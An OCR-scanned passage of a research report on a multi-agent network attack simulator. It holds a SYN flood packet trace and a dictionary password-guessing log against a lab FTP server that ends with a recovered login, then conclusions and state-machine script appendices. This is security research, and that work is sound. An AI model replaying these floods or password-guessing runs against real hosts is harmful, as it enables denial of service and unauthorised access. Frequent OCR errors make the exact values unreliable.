192.168.128.15 . 1034->192 .168.130.135.21  TCP  SVN  <seq 

9 3 be  ack:  0> 

192. 168. 128. 15. 1035->1 92. 168. 130. 135. 21  TCP  SVN  <seq 

25a62  ack:  0> 

192.168.128.15.1036->192.168.130.135.21  TCP  SVN  <seq 

b8ab  ack:  0> 

192.168.128.15.1O37->192.168.130.135.21  TCP  SVN  <seq 

2436  ack:  0> 

192. 168. 128. 15. 103 8->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

36f 1  ack:  0> 

192. 168. 128. 15. 103 9->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

8575  ack:  0> 

192.168.128.15 .1040->192 .168.130.135.21  TCP  SVN  <seq 

31al  ack:  0> 

192.168.128.15 .1041 ->192 .168.130.135.21  TCP  SVN  <seq 

la20c  ack:  0> 

192.168.128.15 . 1042 ->192 .168.130.135.21  TCP  SVN  <seq 

7d73  ack:  0> 

192.168.128.15 . 1043->192 .168.130.135.21  TCP  SVN  <seq 

202ec  ack:  0> 

192.168.128.15 .1044->192 .168.130.135.21  TCP  SVN  <seq 

19271  ack:  0> 

192.168.128.15 .1045 ->192 .168.130.135.21  TCP  SVN  <seq 

18f 51  ack:  0> 

192.168.128.15 . 1046 ->192 .168.130.135.21  TCP  SVN  <seq 

134c5  ack:  0> 

192.168.128.15 . 1047->192 .168.130.135.21  TCP  SVN  <seq 

54e7  ack:  0> 

192.168.128.15 .1048 ->192 .168.130.135.21  TCP  SVN  <seq 

ld501  ack:  0> 

192.168.128.15 . 1049 ->192 .168.130.135.21  TCP  SVN  <seq 

3d63  ack:  0> 

192. 168. 128. 15. 1050- >192. 168. 130. 135. 21  TCP  SVN  <seq 

16b89  ack:  0> 

192. 168. 128. 15. 105 1->192. 168. 130. 135. 21  TCP  SVN  <seq 

206fc  ack:  0> 

192.168.128.15.1052->192.168.130.135.21  TCP  SVN  <seq 

16fe4  ack:  0> 

192. 168. 128. 15. 105 3->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

23ca8  ack:  0> 

192. 168. 128. 15. 105 4->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

d45d  ack:  0> 

192.168.128.15.1055->192.168.130.135.21  TCP  SVN  <seq 

195e6  ack:  0> 

192.168.128.15.1O56->192.168.130.135.21  TCP  SVN  <seq 

26f2a  ack:  0> 

192. 168. 128. 15. 1057- >192. 168. 130. 135. 21  TCP  SVN  <seq 

121dd  ack:  0> 

192. 168. 128. 15. 105 8->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

c5d0  ack:  0> 

192. 168. 128. 15. 105 9->192. 168. 130. 135. 21  TCP  SVN  <seq 

27f 83  ack:  0> 

192. 168. 128. 15. 1 06 0->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

94a7  ack:  0> 

192. 168. 128. 15. 1 06 1->1 92. 168. 130. 135. 21  TCP  SVN  <seq 

235af  ack:  0> 

192. 168. 128. 15. 106 2->192. 168. 130. 135. 21  TCP  SVN  <seq 

17bb5  ack:  0> 

192. 168. 128. 15. 106 3->192. 168. 130. 135. 21  TCP  SVN  <seq 

20ef4  ack:  0> 

192.168.128.15 . 1064->192 .168.130.135.21  TCP  SVN  <seq 

14339  ack:  0> 

192. 168. 128. 15. 106 5->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

1428f  ack:  0> 

192. 168. 128. 15. 106 6->192. 168. 130. 135. 21  TCP  SVN  <seq 

f d98  ack:  0> 

192. 168. 128. 15. 106 7->192. 168. 130. 135. 21  TCP  SVN  <seq 

13920  ack:  0> 

192. 168. 128. 15. 106 8->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

3980  ack:  0> 

192. 168. 128. 15. 106 9->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

174b2  ack:  0> 

192. 168. 128. 15. 1070- >192. 168. 130. 135. 21  TCP  SVN  <seq 

24e8c  ack:  0> 

192.168.128.15 .1071 ->192 .168.130.135.21  TCP  SVN  <seq 

21d63  ack:  0> 

192.168.128.15 . 1072 ->192 .168.130.135.21  TCP  SVN  <seq 

15fae  ack:  0) 

192.168.128.15 . 1073 ->192 .168.130.135.21  TCP  SVN  <seq 

18088  ack:  0> 

192.168.128.15 .1074->192 .168.130.135.21  TCP  SVN  <seq 

lca25  ack:  0> 

192.168.128.15 .1075 ->192 .168.130.135.21  TCP  SVN  <seq 

lfe82  ack:  0> 

192.168.128.15 . 1076 ->192 .168.130.135.21  TCP  SVN  <seq 

2cbf  ack:  0> 

192. 168. 128. 15. 1077- >192. 168. 130. 135. 21  TCP  SVN  <seq 

20332  ack:  0> 

192.168.128.15 .1078 ->192 .168.130.135.21  TCP  SVN  <seq 

52c6  ack:  0> 

192.168.128.15 .1079 ->192 .168.130.135.21  TCP  SVN  <seq 

147e9  ack:  0> 

192. 168. 128. 15. 1080- >192. 168. 130. 135. 21  TCP  SVN  <seq 

266d3  ack:  0> 

192. 168. 128. 15. 1 08 1->1 92. 168. 130. 135. 21  TCP  SVN  <seq 

dl65  ack:  0> 

192. 168. 128. 15. 108 2->192. 168. 130. 135. 21  TCP  SVN  <seq 

352a  ack:  0> 

192. 168. 128. 15. 108 3->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

If 30b  ack:  0> 

192. 168. 128. 15. 1084- >192. 168. 130. 135. 21  TCP  SVN  (seq 

lc2cd  ack:  0> 

192. 168. 128. 15. 108 5->192. 168. 130. 135. 21  TCP  SVN  <seq 

la87e  ack:  0> 

192. 168. 128. 15. 108 6->192. 168. 130. 135. 21  TCP  SVN  <seq 

le50f  ack:  0> 

192. 168. 128. 15. 108 7->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

1612f  ack:  0> 

192. 168. 128. 15. 108 8->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

12746  ack:  0> 

192. 168. 128. 15. 108 9->192. 168. 130. 135. 21  TCP  SVN  <seq 

If 5c7  ack:  0>  ZJ 

Fig.2.6.33.  Example  of  the  window  showing  the  attack  “SYN  flood”  (SF)  realization  at  a  micro-level 
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Fig.2.6.34.  Example  of  the  window  showing  realization  of  the  intention  “Escalating  Privilege”  (EP)  scenario 
at  a  macro-level  and  a  call  of  “Password  Cracking”  (PC)  attack  action 


Examples  of  the  screens  displaying  the  generation  of  attack  “Password  Cracking”  (PC)  are 
depicted  in  Fig.2.6.34  and  Fig.2.6.35. 

A  fragment  of  the  intention  “Escalating  Privilege”  (EP)  scenario  at  a  macro-level  and  a  call  of 
attack  “Password  Cracking”  (PC)  is  shown  in  Fig.2.6.34. 

An  example  of  the  window  showing  the  attack  “Password  Cracking”  (PC)  realization  at  a  micro- 
levelis  represented  in  Fig.2.6.35. 

The  logs  of  attack  traces  produced  in  experiments  fulfilled  on  micro- level  are  fixed  in  Appendix 
A4.2. 

Fragments  of  logs  for  port  scanning  are  presented  in  paragraph  A4.2.1,  fragments  of  logs  for  SYN 
flood  -  in  paragraph  A4.2.2,  and  fragments  of  logs  for  password  guessing  (cracking)  -  in  paragraph 
A4.2.3. 
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B1  Shortcut  to  PORTAL.BAT  -  n|  x 


Connect ing ... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  u4.1  for  MinSock  ready... 

Send:  USER  enan 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  Aberdeen 
Reply:  530  Not  logged  in. 

Bad  password? 

Connecting. . . 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Seru-U  FTP  Server  v4.1  for  MinSock  ready... 

Send:  USER  enan 

Reply:  331  User  nane  okay,  need  password. 

Send:  PASS  Abernathy 
Reply:  530  Not  logged  in. 

Bad  password! 


Connect ing ... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  MinSock  ready... 
Send:  USER  enan 

Reply:  331  User  nane  okay,  need  password. 

Send:  PASS  Abidjan 
Reply:  530  Not  logged  in. 

Bad  password! 


J 


Connecting. . . 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  MinSock  ready... 

Send:  USER  enan 

Reply:  331  User  nane  okay,  need  password. 

Send:  PASS  Abigail 
Reply:  530  Not  logged  in. 

Bad  password! 

Connect ing ... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  MinSock  ready... 

Send:  USER  enan 

Reply:  331  User  nane  okay,  need  password. 

Send:  PASS  Abner 
Reply:  530  Not  logged  in. 

Bad  password? 

Connecting. . . 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  MinSock  ready... 

Send:  USER  enan 

Reply:  331  User  nane  okay,  need  password. 

Send:  PASS  Abo 

Reply:  530  Not  logged  in. 

Bad  password! 

Connect ing ... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  MinSock  ready... 

Send:  USER  enan 

Reply:  331  User  nane  okay,  need  password. 

Send:  PASS  enan 

Reply:  230  User  logged  in,  proceed. 

SUCCESS?  Use  this  account  and  password  for  access  to  ftp-server: 
USERNAME:  enan 
PASSUD:  enan 


Fig.2.6.35.  Example  of  the  window  showing  the  attack  “Password  Cracking”  (PC)  realization  at  a  micro-level 


2.7.  Conclusion 

The  second  chapter  describes  the  architecture  of  the  Attack  Simulator  prototype,  its  functional 
capabilities,  peculiarities  of  implementation,  and  also  sketches  the  results  of  the  simulation-based 
exploration  of  the  developed  Attack  Simulator  prototype. 

The  main  conclusions  concerning  the  Attack  Simulator  prototype  and  results  of  its  evaluation  are 
as  follows: 

1 .  The  software  prototype  for  computer  network  attack  simulation  is  built  as  a  multi-agent  system 
that  uses  two  classes  of  agents:  (1)  “Network  Agent”  and  (2)  "Hacker  Agent”.  The  Network  Agent 
simulates  defensive  system  of  the  attacked  computer  network  and  the  Hacker  Agent  simulates  a  hacker 
performing  attack  against  computer  network.  In  the  developed  prototype  each  agent  class  has  single 
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instance  although  the  developed  technology  makes  it  possible  to  model  and  simulate  a  team  of  hackers 
and  a  team  of  agents  responsible  for  computer  network  security. 

2.  The  Attack  Simulator  is  implemented  on  the  basis  of  the  technology  supported  by  Multi-Agent 
System  Development  Kit  (MASDK)  that  is  a  multi-agent  platform  aiming  at  support  of  the  design  and 
implementation  of  multi-agent  systems  [Gorodetski  et  al- 02a].  The  developed  and  implemented 
simulator  comprises  the  multitude  of  reusable  components  generated  by  use  of  the  MASDK  standard 
functionalities  and  application-oriented  software  components  developed  manually  in  terms  of 
programming  language  MS  Visual  C++  6.0  SP  5. 

3.  Each  agent  operates  using  the  respective  fragment  of  the  application  ontology.  The  interaction 
between  agents  in  the  process  of  attack  simulation  is  supported  by  the  communication  component.  An 
advantage  of  such  a  knowledge  representation  makes  it  actually  possible  to  simulate  adversary 
interactions.  In  such  a  model,  while  simulating  an  attack,  Hacker  Agent  sends  a  certain  message  to  the 
Network  Agent.  The  Network  Agent,  like  this  takes  place  in  real-life  interactions,  analyzes  the 
received  message  and  forms  a  responsive  message.  This  message  is  formed  through  use  of  the 
Network  Agent's  knowledge  base  that  models  the  network  configuration,  information  about  possible 
existing  attacks  and  reaction  of  the  network  on  them. 

4.  The  behaviors  of  both  the  Hacker  Agent  and  the  Network  Agent  specified  on  the  basis  of  state - 
machine  models,  which  interpret  agents'  behavior  specified  formally  by  use  of  formal  grammar 
framework.  The  Hacker  Agent  acts  on  the  basis  of  a  family  of  nested  state  machines.  The  state 
machine  model  of  the  Network  Agent  is  represented  by  a  single  state  machine.  It  determines  states, 
transitions  from  states  to  states,  and  conditions  for  such  transitions.  Each  state  represents  actions  that 
should  be  carried  out  when  the  state  machine  transits  into  that  state.  These  actions  are  initialized  after 
the  states  of  the  state  machines  are  processed.  Actions  are  represented  in  terms  of  scripts  of  the 
MASDK  Script  Language. 

5.  A  detailed  specification  of  all  notions,  their  attributes,  and  values  of  attributes  used  in  the 
Attack  Simulator  has  been  realized  in  the  component  of  the  application  domain  ontology.  Ontology  is 
filled  in  during  the  design  stage  through  using  the  MASDK  Ontology  Editor.  Classes,  class  attributes, 
and  meta-classes  that  unify  classes  into  groups  are  entered  and  modified  through  the  ontology  editor’s 
user  interface.  The  general  notions  of  the  application  domain  ontology  are  as  follows: 

•  Appl  serves  to  store  the  names  of  applications  mnning  on  the  attacked  host; 

•  Attack  is  to  ensure  communication  between  agents  MainHack  and  MainNet, 

•  Attacks  determines  the  knowledge  of  the  agent  MainNet  about  network  attacks; 

•  DNS  I ,  DNS2 ,  Domain ,  DomLink  and  DomHost  define  information  about  network  domain, 
mail  servers  and  hosts; 

•  Firewall,  ForbiddenLocalAddr  and  ForbiddenRemoteAddr  determine  firewalls’  data; 

•  Host  serves  to  store  detailed  information  about  hosts  (domain  name,  IP  address,  OS  version, 
type  and  platform,  etc.); 

•  KnownLANs  determines  hacker’s  knowledge  about  networks; 

•  LAN  determines  the  network’s  knowledge  of  itself; 

•  Log  and  LogResult  store  the  attack  route  in  terms  of  state  machines  and  the  obtained  results; 

•  Objective  is  to  describe  malefactor’s  intention  being  implemented; 

•  Objectives  stores  descriptions  of  all  intentions  of  the  attacker  realized  in  the  prototype; 

•  Security,  Sendee,  SharedRes,  TrusHosts  and  User  keep  information  about  hosts’  security 
parameters,  recourses  and  users; 

•  Step  stores  data  on  the  current  step  of  state  machines. 

6.  The  Hacker  Agent  comprises  the  following  main  components: 

•  Agent  hacker  Kernel  contains  functions  needed  for  exploiting  ontology,  running  state 
machines,  defining  attack  task  specification,  computing  next  state -machine  transition, 
initiating  attack  development  visualization; 

•  Fragment  of  the  application  domain  ontology  specifies  a  set  of  notions  and  attributes  used  by 
the  Hacker  Agent; 

•  State  machines  model  component  is  used  for  specification  of  the  Hacker  Agent  behavior; 


126 


•  Scripts  component  specifies  the  set  of  scripts  that  can  be  performed  by  the  Hacker  Agent's 
state  machines; 

•  attack  task  specification  component  provides  user  with  interface  needed  to  specify  attack 
attributes; 

•  probabilistic  decision-making  model  is  used  to  determine  the  Hacker  Agent's  further  actions  in 
attack  generation; 

•  network  traffic  generator  is  used  to  form  the  flow  of  network  packets  for  several  classes  of 
attacks  directed  to  the  hosts  according  to  the  attack  specification; 

•  visualization  component  of  the  attack  scenario  development  is  used  for  visual  representation 
of  the  attack  progress,  corresponding  to  each  action  of  attacker  and  respective  response  of  the 
Network  Agent. 

7.  The  main  components  of  the  Network  Agent  are  as  follows: 

•  Network  Agent  Kernel  contains  functions  for  processing  the  application  domain  ontology  and 
the  state  machine  model,  specifying  network  configuration,  initializing  firewall  model,  and 
computing  the  network’s  response  to  an  attacking  action; 

•  Fragment  of  the  application  domain  ontology  determines  a  set  of  notions  and  attributes  used 
by  the  Network  Agent; 

•  state  machines  model  component  specifies  the  actions  corresponding  to  the  incoming  message 
receiving,  their  classification,  processing,  and  sending  the  response; 

•  scripts  component  specifies  a  set  of  scripts  initialized  from  the  state  machine  model  of  the 
Network  Agent; 

•  network  configuration  specification  component  is  used  for  the  specification  of  a  set  of  user 
interfaces  aiming  at  description  and  configuration  of  the  network  to  be  attacked; 

•  firewall  model  component  is  used  to  determine  the  firewall’s  response  to  the  action  generated 
by  the  Hacker  Agent; 

•  generator  of  the  network’s  response  is  used  for  the  generation  of  the  network’s  and  hosts’ 
responses  (messages)  to  attack  actions. 

8.  The  main  objective  cf  the  experiments  conducted  was  demonstration  of  the  Attack  Simulator 
prototype  efficacy  for  accomplishing  various  attack  scenarios  against  networks  with  different 
structures  and  security  policies  implemented.  The  following  practically  interesting  tasks  are 
considered  by  authors  as  potential  opportunities  provided  by  the  developed  Attack  simulator 
prototype: 

•  Checking  a  computer  network  security  policy  at  stages  of  conceptual  and  logic  design  of 
network  security  system.  This  task  can  be  solved  by  simulation  of  attacks  at  a  macro-level  and 
investigation  of  responses  of  a  network  model  being  designed  (analyzed); 

•  Checking  security  policy  of  a  real-life  computer  network.  This  task  can  be  solved  by  means  of 
simulation  of  attacks  at  a  micro- level,  i.e.  by  generating  a  network  traffic  corresponding  to  real 
activity  of  malefactors  on  realization  of  various  security  threats. 

This  is  justification  of  two  classes  of  experiments  that  have  been  fulfilled  with  the  Attack 
Simulator  prototype: 

•  Experiments  with  simulation  cf  attacks  on  macro -level.  In  these  experiments,  generation  and 
investigation  of  malicious  actions  against  computer  network  model  were  carried  out; 

•  Experiments  with  simulation  of  attacks  on  micro-level.  In  these  experiments,  generation  of 
malicious  network  traffic  against  a  real  computer  network  was  fulfilled. 

9.  In  the  experiments  with  simulation  of  attacks  on  macro-level,  explorations  of  attacks  for  all 
malefactor's  intentions  implemented  have  been  accomplished.  These  experiments  were  carried  out  for 
various  parameters  of  the  attack  task  specification  and  an  attacked  computer  network  configuration. 
Besides  malefactor’s  intention,  it  was  investigated  the  influence  on  attacks  efficacy  of  the  following 
input  parameters :  protection  degree  of  network  and  personal  firewall,  protection  degree  of  attacked 
host  (for  example,  how  strong  is  the  password,  does  the  host  has  sharing  files,  printers  and  other 
resources,  does  the  host  use  trusted  hosts,  etc.),  and  degree  of  hacker’s  knowledge  about  a  network.  To 
investigate  the  Attack  Simulator  capabilities,  the  following  parameters  of  attack  realization  outcome 
have  been  selected:  number  of  terminal  level  attack  actions,  percentage  of  the  hacker’s  intentions 
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realized  successfully,  percentage  of  “successful”  network  responses  on  attack  actions,  percentage  of 
attack  actions  blockage  by  firewall,  percentage  of  “ineffective”  results  of  attack  actions  (when  attack 
is  not  successful).  In  all  experiments  the  Attack  Simulator  allows  to  generate  the  clearly  interpretable 
results. 

10.  Taking  into  account  limitation  of  the  Report  space,  the  results  of  experiments  on  macro-level 
only  for  two  classes  of  intentions  concerning  to  each  of  the  high-level  intentions  Reconnaissance  ( R ) 
and  Implantation  and  threat  realization  (I)  have  been  described  in  detail.  For  high-level  intention  R, 
the  results  of  experiments  for  intentions  Identification  of  the  host  Services  (IS)  and  Applications  and 
Banners  Enumeration  (ABE)  have  been  represented.  For  high-level  intention  /,  the  results  of 
experiments  for  intentions  Gaining  Access  to  Resources  (GAR)  and  Confidentiality  Violation 
Realization  (CVR)  have  been  considered. 

At  carrying  out  the  attacks  realizing  intentions  IS  and  ABE,  it  was  supposed,  that  network  firewall 
can  protect  the  attacked  network  by  “Strong”,  “Medium”  and  “None”  degrees  of  defense  depending  on 
completeness  of  terminal  level  attacks  list  that  can  be  recognized  by  firewall.  For  intention  IS  and 
ABE,  the  plots  of  the  dependencies  of  the  attack  outcome  parameters  from  the  network  firewall 
protection  degree  have  been  built. 

At  fulfilling  the  attacks  realizing  intentions  GAR  and  CVR,  attacks  were  carried  out  under  the 
following  varying  conditions:  (1)  for  two  values  of  protection  degree  of  the  network  firewall  (1  - 
“Strong”;  2  -  “None”);  (2)  for  two  values  of  protection  degree  of  personal  firewall  (1  -  “Strong”;  2  - 
“None”);  (3)  for  two  values  of  protection  degree  of  parameters  of  attacked  host  (1  -  “Strong”;  2  -  “ 
Weak”);  and  (4)  for  two  values  of  the  level  of  hacker’s  knowledge  about  a  network  (1  -  “Good”;  2  - 
“Nothing”).  For  intention  GAR  and  CVR,  the  plots  of  dependencies  of  attack  outcome  parameters 
from  various  input  parameters  have  been  constructed. 

11.  In  the  current  version  of  the  prototype,  the  network  traffic  generation  is  only  implemented  for 
certain  network  attacks.  Those  attacks  are  selected  from  different  classes  of  attacks  and  (or) 
malefactors’  intentions  specified  in  the  application  domain  ontology.  The  authors  have  not  tasked 
themselves  with  implementing  all  attack  actions  on  lower  level.  The  main  emphasis  has  been  made  on 
developing  the  general  approach  to  generating  the  network  traffic  by  use  of  the  attack  simulator 
prototype  and  assessing  its  feasibility  and  effectiveness. 

For  evaluation  of  the  efficacy  of  the  Attack  Simulator  prototype  at  a  micro- level,  the  network 
packets  for  the  attacks  classes  “Port  scanning” ,  “Denial  of  service”,  and  “Password  Guessing”  have 
been  generated.  The  network  model  used  in  experiments  with  the  Attack  Simulator  corresponded  to  a 
real  computer  network  against  which  attacks  at  a  micro- level  were  carried  out. 
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General  Conclusion  of  the  Project 

This  Report  gives  a  summary  of  the  results  presented  in  previous  reports  and  summarizes  the 
results  of  the  forth  phase  of  the  research,  which,  in  general,  supposes  development  of  the  software 
prototype  of  the  Attack  Simulator  implementing  theoretical  results  of  research  and  its  evaluation. 

The  main  conclusions  resulting  from  the  research  presented  in  the  Report  are  as  follows. 

•  The  main  peculiarities  of  the  developed  approach  to  the  computer  network  attack  modeling 
and  simulation  are  (1)  malefactor's  intention-centric  and  target-oriented  attack  modeling  and 
simulation,  (2)  multi-level  attack  specification  in  the  consecution  (from  upper  to  lower  levels) 
“attack  task  (goal)  and  attack  object  — »  structured  malefactor’s  intentions  — >  malefactors 
actions  — »  attacked  network  response”,  (3)  ontology-based  attack  model  structuring,  (4) 
attributed  stochastic  context-free  grammar  for  formal  specification  of  attack  scenarios  and  its 
components  (“simple  attacks”)  and  using  operation  of  formal  grammar  substitution  for 
specification  of  multi-level  structure  of  attacks,  (5)  state  michinc- based  formal  grammar 
framework  implementation;  (6)  on-line  generation  of  the  malefactor’s  activity  resulting  from 
the  reaction  of  the  attacked  network  security  system. 

•  The  software  prototype  of  the  Attack  Simulator  is  built  as  a  multi-agent  system  consisting  of 
two  classes  of  agents  (Hacker  Agent  and  Network  Agent),  which  activity  is  based  on  the 
“Attacks  against  computer  network”  application  ontology  and  a  communication  component. 
The  Hacker  Agent  simulates  a  hacker  performing  attack  against  computer  network.  The 
Network  Agent  simulates  defense  system  of  the  attacked  computer  network.  Each  agent 
operates  using  the  respective  fragment  of  the  application  ontology.  The  interaction  between 
agents  in  the  process  of  attack  simulation  is  supported  by  the  communication  component.  The 
developed  and  implemented  simulator  comprises  the  multitude  of  reusable  components 
generated  by  use  of  the  by  Multi-Agent  System  Development  Kit  (MASDK)  standard 
functionalities  and  application- oriented  software  components  developed  manually  in  terms  of 
programming  language  MS  Visual  C++  6.0.  The  developed  technology  makes  it  possible  to 
simulate  in  the  future  adversary  interactions  of  a  team  of  hackers  and  a  team  of  network 
defense  agents. 

•  Two  types  of  experiments  have  been  fulfilled  with  the  Attack  Simulator  prototype:  (1) 
simulation  of  attacks  on  macro-level.  In  these  experiments,  generation  and  investigation  of 
malicious  actions  against  computer  network  model  have  been  carried  out;  (2)  simulation  of 
attacks  on  micro- level.  In  these  experiments,  generation  malicious  network  traffic  against  a 
real  computer  network  has  been  fulfilled.  The  simulation  -based  exploration  of  the  developed 
Attack  Simulator  prototype  has  demonstrated  its  effic  acy  for  accomplishing  various  attack 
scenarios  against  networks  with  different  structures  and  security  policies  implemented. 

•  Th e  further  development  of  the  computer  network  attack  modeling  software  prototype  can 
consist  of  enlargement  of  capabilities  in  specification  of  the  attack  tasks,  expansion  of  the 
attack  classes,  support  for  setting  more  complicate  structures  of  the  attacked  networks, 
implementing  more  sophisticated  attack  scenarios  on  a  real  network  using  different  attack 
objects  and  exploits,  evolving  the  attack  modeling  system  as  a  team  of  hacker-agents  that  are 
collectively  realize  coordinated  distributed  attacks,  and  some  others. 

The  above  results  cover  all  the  tasks  scheduled  within  the  Task  1  of  the  Project  #1994P. 
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Appendix  1.  Examples  of  the  state  machines  of  the  Hacker  Agent  operation 


I.  State  machine  A  (Network  attack) 

1.  Identifier  of  the  node  to  which  the  state  machine  corresponds.  (1) 

3.  Main  parameters  of  the  state  machine. 
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End 

5.  Transition  conditions.  Absent. 

6.  Scripts. 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  A  of  the  state  machine  A 


Entry 

Entry  action 

A_INIT_Entry 

IF  Objective. Exist(Flag  =  "1"  )  THEN  Objective.Update(Flag  =  ""  );  ENDIF; 

CALLSCRIPT  ( Attack_As sign_Do ) ; 

tmpLog.Create(); 

tmpLog_A=""; 

tmpLog_C=""; 

tmpLog_S=""; 

tmpLog_ResultComment=""; 
tmpLog_Type=""; 
tmpLog_DebugInfo=" " ; 
tmpLog_R=""; 
tmpLog_Description=""; 

State  machine  name 

A 

Relevant  intentions 

1,2,3,4,5,6,7,8,9,10,11,12 

States 

R,  I,  End 

First  State 

R 

Nonterminal  states 

R,  I 

Terminal  states 

- 

Auxiliary  states 

- 

2.  State  machine  diagram. 


4.  Parameters  of  transitions. 
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EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
EXECSQLl  Delete 
_InitAtLogView  1); 


From  Log ); 

From  LogResult ); 
From  Host ); 

From  Appl ); 

From  DomLink); 
From  Security  ); 
From  Service  ); 
From  SharedRes  ); 
From  Step ); 

From  TrusHosts  ); 
From  User  ); 

From  DNS  1  ); 
From  DNS2  ); 
From  Domain  ); 
From  DomHost ); 


State  action 

Do  action 

_InitDB(); 

Transitions.  Condition  /  Next  state  /  Action 

Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  R  of  the  state  machine  A 


Entry 

Entry  action 

Log.Create(); 

Log.A  =  "A"; 

A_R_Entry 

Log.S  =  "I"; 

Log. Description  =  "RECONNAI SANCE"; 

Log.Debuglnfo  =  "A  =>  R"; 

Log.C  =  "Nonterminal_State_2"; 

Log.Type  =  2; 

AUTOl  R ); 

State  action 

Do  action 

Step.xState  =  "R"; 

Step. Condition  =  0; 

A_R_Do 

CALLSCRIPT1  Do_script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "R" 


Step.yState  =  "I" 


Step.yState  =  "End" 


Exit  action 


Scenario  of  the  agent  “Hacker”  behaviour  in  the  state  I  of  the  state  machine  A 


Entry 

Entry  action 

Log.CreateQ;  Log.A  =  "A";  Log.S  =  "I"; 

Log.Description  =  "IMPLANTATION  AND  THREAT  REALIZATION"; 

A_I_Entry 

Log.Debuglnfo  =  "A  =>  I"; 

Log.C  =  "Nonterminal_State_3"; 

Log.Type  =  2; 

AUTOl  I ); 

State  action 

Do  action 

Step.xState  =  "I"; 

Step. Condition  =  0; 

A_I_Do 

CALLSCRIPT1  Do_script ); 

Transitions.  Condition  /  Next  state  /  Action 
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Script  of  the  agent  “Hacker”  behaviour  in  the  state  End  of  the  state  machine  A 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

A_End_Do 

Log.Create(); 

Log.A="RRM"; 

Log.S="END"; 

Log.Type=10; 

Log.Description  =" ATTACK  IS  OVER  !!!"; 

_UpdateAtLogView  ( ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

□ 

Exit  action 


Common  script  of  next  state  selection 


Entry 


Entry  action 

State  action 

Do  action 

Step. Objective  =  Objective. ObjID; 

Step.SMname  =  ClassAuto; 

Do_Script 

TransitionSelect  (Step.Objective,  Step.SMname,  Step.xState,  Step.Condition, 

Step.yState); 

_UpdateAtLogView(); 

Transitions.  Condition  /  Next  state  /  Action 

Exit  action 


Common  script  for  the  notion  “Attack”  cleaning 


I  Entry  j 

|  Entry  action 

|  State  action  | 

Do  action 

Attack_Erase_Do 

Attack_Name='"';  Attack_HackerIP="";  Attack_ip="''; 

Attack_Class="";  Attack_IsNet=0;  Attack_Port=""; 

Attack_SubClassO=" " ;  Attack_SubClassl =" " ;  Attack_SubClass2=""; 

Attack_OSplatform="";  Attack_OStype="";  Attack_OSversion="";  Attack_Message=""; 
Attack_SharedRes=" " ;  Attack_DomLink=" Attack_DomainControl=" " ; 
Attack_DomainName="";  Attack_UserID="";  Attack_UserSID="";  Attack_UserPsw=""; 
Attack_Appl="";  Attack_DNSlHostName="";  Attack_DNS2Post="";  Attack_SysTime=""; 
Attack_Mask='"';  Attack_DNS2DomName="";  Attack_DNSlHostIP=""; 

Attack_TmsHost="";  Attack_IsInNet=0; 

|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

□ 

Exit  action 


Common  script  for  defining  the  basic  attributes  of  the  notion  “Attack” 


1  Entry  | 

|  Entry  action 

|  State  action  j 

Do  action 

Attack_Assign_Do 

Attack_HackerIP=Objective_OwnIP;  Attack_IsNet=Objective_Net; 
Attack_ip=Objective_Host; 

|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

□ 

Exit  action 


II.  State  machine  R  (Reconnaissance) 

1.  Identifier  of  the  node  to  which  the  state  machine  corresponds.  (1 1) 

2.  State  machine  diagram. 


3.  Main  parameters  of  the  state  machine. 


State  machine  name 

R 

Relevant  intentions 

1,2,3,4,5,6,7,8,9,10,11,12 

States 

Rl,  IH,  IS,  10,  Cl,  RE,  UE, 
ABE,  End 

First  State 

Rl 

Nonterminal  states 

IH,  IS,  10,  Cl,  RE,  UE,  ABE 

Terminal  states 

- 

Auxiliary  states 

Rl 
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4.  Parameters  of  transitions. 
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0 

0 

0 

0 

6 

R1 

IO 

0 

0 

0 

0 

0 

0 

0.16 

0 .16 

0 .16 

0.16 

0.16 

0.16 

7 

R1 

RE 

0 

0 

0 

1 

0 

0 

0 

0 

0 

0 

0 

0 

8 

R1 

UE 

0 

0 

0 

0 

1 

0 

0 

0 

0 

0 

0 

0 

9 

R1 

ABE 

0 

0 

0 

0 

0 

1 

0 

0 

0 

0 

0 

0 

10 

IH 

R_IH_Do 

R  IH  Entry 

IH 

0.7 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

11 

IH 

IS 

0 

0 

0 

0 

0 

0 

0.6 

0.6 

0.6 

0.6 

0.6 

0.6 

12 

IH 

IO 

0 

0 

0 

0 

0 

0 

0.4 

0.4 

0.4 

0.4 

0.4 

0.4 

13 

IH 

End 

0.3 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

14 

IS 

R_IS_Do 

R_IS_Entry 

IS 

0 

0.7 

0 

0 

0 

0 

0 

0 
